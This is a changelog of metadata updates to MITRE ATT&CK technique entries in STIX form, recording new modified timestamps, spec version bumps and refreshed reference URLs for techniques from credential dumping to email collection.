external_references[2]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://www.icann.org/en/ssac/registration-services/documents/sac-007-domain-name-hijacking-incidents-threats-risks-and-remediation-12-07-2005-en |
[T1036.007] Masquerading: Double File Extension
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-14 21:09:59.588000+00:00 | 2025-04-15 22:23:40.712000+00:00 |
[T1608.004] Stage Capabilities: Drive-by Target
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-15 00:21:55.791000+00:00 | 2025-04-15 22:24:03.854000+00:00 |
external_references[3]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1027.007] Obfuscated Files or Information: Dynamic API Resolution
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-23 18:32:46.899000+00:00 | 2025-04-15 22:24:25.266000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1218.015] System Binary Proxy Execution: Electron Applications
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-15 23:00:33.493000+00:00 | 2025-04-15 22:24:54.174000+00:00 |
[T1087.003] Account Discovery: Email Account
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 20:35:35.125000+00:00 | 2025-04-15 22:25:10.775000+00:00 |
[T1585.002] Establish Accounts: Email Accounts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-28 21:11:27.088000+00:00 | 2025-04-15 22:25:33.493000+00:00 |
[T1586.002] Compromise Accounts: Email Accounts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-11 01:07:48.218000+00:00 | 2025-04-15 22:26:01.830000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1589.002] Gather Victim Identity Information: Email Addresses
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 14:30:10.979000+00:00 | 2025-04-15 22:26:21.953000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1114] Email Collection
Current version: 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 12:24:27.627000+00:00 | 2025-04-15 22:26:37.477000+00:00 |
[T1114.003] Email Collection: Email Forwarding Rule
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:26:55.201000+00:00 |
[T1564.008] Hide Artifacts: Email Hiding Rules
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:56:27.592000+00:00 | 2025-04-15 22:27:09.849000+00:00 |
[T1589.003] Gather Victim Identity Information: Employee Names
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-16 16:09:45.795000+00:00 | 2025-04-15 22:27:33.795000+00:00 |
[T1499] Endpoint Denial of Service
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:56:47.424000+00:00 | 2025-04-15 22:28:03.155000+00:00 |
external_references[4]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
[T1585] Establish Accounts
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-28 21:08:56.520000+00:00 | 2025-04-15 22:28:26.144000+00:00 |
[T1546] Event Triggered Execution
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:57:00.731000+00:00 | 2025-04-15 22:28:46.740000+00:00 |
[T1011] Exfiltration Over Other Network Medium
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-11 16:06:10.376000+00:00 | 2025-04-15 22:29:20.961000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1212] Exploitation for Credential Access
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:30:06.288000+00:00 |
[T1587.004] Develop Capabilities: Exploits
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:07:53.803000+00:00 | 2025-04-15 22:33:51.026000+00:00 |
[T1588.005] Obtain Capabilities: Exploits
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:14:01.255000+00:00 | 2025-04-15 22:34:05.500000+00:00 |
[T1491.002] Defacement: External Defacement
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 19:34:37.539000+00:00 | 2025-04-15 22:34:21.584000+00:00 |
external_references[1]['description'] | FireEye. (n.d.). Retrieved April 19, 2019. | FireEye. (n.d.). Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf | https://web.archive.org/web/20210719110553/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf |
[T1133] External Remote Services
Current version: 2.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:36.318000+00:00 | 2025-04-15 22:34:58.667000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1564.012] Hide Artifacts: File/Path Exclusions
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-15 23:42:39.831000+00:00 | 2025-04-15 22:35:31.731000+00:00 |
[T1027.011] Obfuscated Files or Information: Fileless Storage
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-04 15:05:25.388000+00:00 | 2025-04-15 22:35:48.121000+00:00 |
[T1657] Financial Theft
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:58:10.254000+00:00 | 2025-04-15 22:36:03.465000+00:00 |
[T1592.003] Gather Victim Host Information: Firmware
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:22:46.759000+00:00 | 2025-04-15 22:36:31.208000+00:00 |
[T1187] Forced Authentication
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:33:34.508000+00:00 | 2025-04-15 22:36:48.417000+00:00 |
external_references[3]['description'] | Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017. | Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx | https://web.archive.org/web/20100210125749/https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx |
[T1606] Forge Web Credentials
Current version: 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:58:23.638000+00:00 | 2025-04-15 22:37:02.111000+00:00 |
[T1056.002] Input Capture: GUI Input Capture
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-15 23:39:31.474000+00:00 | 2025-04-15 22:37:16.582000+00:00 |
[T1592] Gather Victim Host Information
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-03 19:35:07.269000+00:00 | 2025-04-15 22:37:32.347000+00:00 |
[T1589] Gather Victim Identity Information
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-16 16:09:45.794000+00:00 | 2025-04-15 22:37:47.951000+00:00 |
external_references[2]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved November 17, 2024. |
external_references[2]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://labs.detectify.com/writeups/slack-bot-token-leakage-exposing-business-critical-information/ |
[T1590] Gather Victim Network Information
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:34:23.229000+00:00 | 2025-04-15 22:38:13.461000+00:00 |
external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1591] Gather Victim Org Information
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-27 15:37:09.343000+00:00 | 2025-04-15 22:38:32.343000+00:00 |
external_references[2]['description'] | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021. | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.sec.gov/edgar/search-and-access | https://www.sec.gov/edgar/search/ |
[T1615] Group Policy Discovery
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-01-06 12:41:08.579000+00:00 | 2025-04-15 22:38:54.812000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1552.006] Unsecured Credentials: Group Policy Preferences
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-15 13:21:22.734000+00:00 | 2025-04-15 22:39:12.196000+00:00 |
[T1592.001] Gather Victim Host Information: Hardware
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-17 16:32:10.810000+00:00 | 2025-04-15 22:39:29.396000+00:00 |
[T1564.002] Hide Artifacts: Hidden Users
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 02:31:01.315000+00:00 | 2025-04-15 22:39:51.186000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1556.007] Modify Authentication Process: Hybrid Identity
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:40:10.913000+00:00 |
[T1590.005] Gather Victim Network Information: IP Addresses
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:31:05.302000+00:00 | 2025-04-15 22:40:30.211000+00:00 |
external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1591.003] Gather Victim Org Information: Identify Business Tempo
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:38:31.983000+00:00 | 2025-04-15 22:40:43.647000+00:00 |
[T1591.004] Gather Victim Org Information: Identify Roles
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:39:08.904000+00:00 | 2025-04-15 22:40:57.270000+00:00 |
[T1564.011] Hide Artifacts: Ignore Process Interrupts
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-11-06 20:14:51.609000+00:00 | 2025-04-15 22:41:11.807000+00:00 |
[T1656] Impersonation
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:59:06.382000+00:00 | 2025-04-15 22:41:31.140000+00:00 |
[T1608.003] Stage Capabilities: Install Digital Certificate
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 17:47:46.409000+00:00 | 2025-04-15 22:42:10.891000+00:00 |
[T1534] Internal Spearphishing
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:59:36.741000+00:00 | 2025-04-15 22:42:40.610000+00:00 |
[T1036.001] Masquerading: Invalid Code Signature
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-02-10 19:52:47.724000+00:00 | 2025-04-15 22:43:00.641000+00:00 |
[T1059.007] Command and Scripting Interpreter: JavaScript
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-07-30 14:12:52.698000+00:00 | 2025-04-15 22:43:16.394000+00:00 |
[T1574.013] Hijack Execution Flow: KernelCallbackTable
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-22 15:47:33.915000+00:00 | 2025-04-15 22:43:44.231000+00:00 |
[T1555.001] Credentials from Password Stores: Keychain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:35:39.985000+00:00 | 2025-04-15 22:44:01.937000+00:00 |
[T1557.001] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-25 15:46:55.393000+00:00 | 2025-04-15 22:44:23.234000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1027.012] Obfuscated Files or Information: LNK Icon Smuggling
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-17 02:12:05.242000+00:00 | 2025-04-15 22:44:37.776000+00:00 |
[T1003.004] OS Credential Dumping: LSA Secrets
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-13 15:49:17.591000+00:00 | 2025-04-15 22:44:50.491000+00:00 |
[T1003.001] OS Credential Dumping: LSASS Memory
Current version: 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-13 13:52:45.379000+00:00 | 2025-04-15 22:45:12.834000+00:00 |
[T1608.005] Stage Capabilities: Link Target
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 20:09:41.391000+00:00 | 2025-04-15 22:45:40.961000+00:00 |
[T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 17:54:22.970000+00:00 | 2025-04-15 22:46:00.944000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1069.001] Permission Groups Discovery: Local Groups
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-07 17:14:42.184000+00:00 | 2025-04-15 22:46:25.458000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1037.002] Boot or Logon Initialization Scripts: Login Hook
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 16:42:05.094000+00:00 | 2025-04-15 22:46:43.054000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1037.001] Boot or Logon Initialization Scripts: Logon Script (Windows)
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-24 23:45:03.153000+00:00 | 2025-04-15 22:46:59.108000+00:00 |
[T1583.008] Acquire Infrastructure: Malvertising
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 20:10:08.246000+00:00 | 2025-04-15 22:47:29.928000+00:00 |
[T1588.001] Obtain Capabilities: Malware
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-17 16:15:52.805000+00:00 | 2025-04-15 22:47:58.443000+00:00 |
[T1587.001] Develop Capabilities: Malware
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-01-14 17:14:27.890000+00:00 | 2025-04-15 22:47:44.654000+00:00 |
external_references[5]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
external_references[5]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
[T1036.010] Masquerading: Masquerade Account Name
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 15:20:36.705000+00:00 | 2025-04-15 22:48:14.966000+00:00 |
[T1036.004] Masquerading: Masquerade Task or Service
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-29 20:30:58.300000+00:00 | 2025-04-15 22:48:29.215000+00:00 |
[T1218.013] System Binary Proxy Execution: Mavinject
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 17:35:08.315000+00:00 | 2025-04-15 22:48:44.734000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1213.005] Data from Information Repositories: Messaging Applications
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 14:22:49.146000+00:00 | 2025-04-15 22:48:58.763000+00:00 |
[T1578.005] Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 14:15:26.322000+00:00 | 2025-04-15 22:49:17.012000+00:00 |
[T1578] Modify Cloud Compute Infrastructure
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-30 13:28:37.414000+00:00 | 2025-04-15 22:49:33.134000+00:00 |
external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1666] Modify Cloud Resource Hierarchy
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 16:15:41.224000+00:00 | 2025-04-15 22:49:45.874000+00:00 |
[T1111] Multi-Factor Authentication Interception
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:37:20.612000+00:00 | 2025-04-15 22:50:08.274000+00:00 |
external_references[1]['description'] | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved November 17, 2024. |
external_references[1]['url'] | https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ | https://www.route-fifty.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ |
[T1621] Multi-Factor Authentication Request Generation
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:50:21.216000+00:00 |
[T1480.002] Execution Guardrails: Mutual Exclusion
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-28 16:22:25.431000+00:00 | 2025-04-15 22:50:39.088000+00:00 |
[T1498] Network Denial of Service
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:01:00.510000+00:00 | 2025-04-15 22:51:06.430000+00:00 |
external_references[3]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
[T1584.008] Compromise Infrastructure: Network Devices
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:10:59.530000+00:00 | 2025-04-15 22:51:26.650000+00:00 |
[T1037.003] Boot or Logon Initialization Scripts: Network Logon Script
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-24 23:45:25.625000+00:00 | 2025-04-15 22:51:42.187000+00:00 |
[T1556.008] Modify Authentication Process: Network Provider DLL
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-05-04 18:02:51.318000+00:00 | 2025-04-15 22:51:56.379000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1590.006] Gather Victim Network Information: Network Security Appliances
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:31:54.275000+00:00 | 2025-04-15 22:52:16.483000+00:00 |
[T1135] Network Share Discovery
Current version: 3.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-29 19:44:43.870000+00:00 | 2025-04-15 22:52:30.350000+00:00 |
[T1590.004] Gather Victim Network Information: Network Topology
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:33:02.476000+00:00 | 2025-04-15 22:52:48.199000+00:00 |
[T1590.003] Gather Victim Network Information: Network Trust Dependencies
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 03:34:22.917000+00:00 | 2025-04-15 22:53:01.571000+00:00 |
[T1003] OS Credential Dumping
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:12:43.034000+00:00 | 2025-04-15 22:53:37.617000+00:00 |
[T1499.001] Endpoint Denial of Service: OS Exhaustion Flood
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:51.289000+00:00 | 2025-04-15 22:53:56.462000+00:00 |
external_references[3]['description'] | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html | https://web.archive.org/web/20220119104451/https://www.corero.com/resource-hub/syn-ack-flood-attack/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1588] Obtain Capabilities
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-16 16:19:41.568000+00:00 | 2025-04-15 22:54:16.100000+00:00 |
[T1137] Office Application Startup
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:01:21.255000+00:00 | 2025-04-15 22:54:32.990000+00:00 |
[T1137.001] Office Application Startup: Office Template Macros
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:01:35.918000+00:00 | 2025-04-15 22:54:50.299000+00:00 |
[T1137.002] Office Application Startup: Office Test
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:01:48.325000+00:00 | 2025-04-15 22:55:04.029000+00:00 |
[T1137.003] Office Application Startup: Outlook Forms
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:02:00.782000+00:00 | 2025-04-15 22:55:18.800000+00:00 |
[T1137.004] Office Application Startup: Outlook Home Page
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:02:13.742000+00:00 | 2025-04-15 22:55:34.415000+00:00 |
[T1137.005] Office Application Startup: Outlook Rules
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:02:26.206000+00:00 | 2025-04-15 22:55:47.125000+00:00 |
[T1556.002] Modify Authentication Process: Password Filter DLL
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-21 16:16:18.271000+00:00 | 2025-04-15 22:56:08.743000+00:00 |
[T1555.005] Credentials from Password Stores: Password Managers
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-08-19 13:53:33.661000+00:00 | 2025-04-15 22:56:22.300000+00:00 |
[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:35.788000+00:00 | 2025-04-15 22:56:46.356000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1069] Permission Groups Discovery
Current version: 2.6
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-15 16:03:06.294000+00:00 | 2025-04-15 22:56:59.585000+00:00 |
[T1647] Plist File Modification
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-04-20 22:00:33.375000+00:00 | 2025-04-15 22:57:13.867000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1556.003] Modify Authentication Process: Pluggable Authentication Modules
Current version: 2.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
